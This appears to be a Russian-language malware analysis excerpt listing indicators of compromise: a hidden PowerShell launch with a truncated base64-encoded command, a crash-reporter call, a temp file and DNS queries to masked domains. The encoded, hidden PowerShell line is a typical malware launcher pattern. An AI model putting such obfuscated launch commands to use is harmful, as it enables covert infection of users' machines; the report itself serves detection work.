Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAGQAZwB5AGgAaAB1AG0AdwB3AGMAPQAnAFYAdQBjAGwAdQB2AG0AcQBnAHAAYwBjAGkAJwA7ACQATQB1AHEAZQBsAHEAcgBkACAAPQAgACcAMwAzADAAJwA7ACQASABzAGUAdwBsAG8AdwB6AGQAagBsAGQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1612
- %TEMP%\1170350.cvr
- DNS ASK us##8.com
- DNS ASK aa##h.org
- DNS ASK ol#.#igbom.com
- DNS ASK va####ademonte.com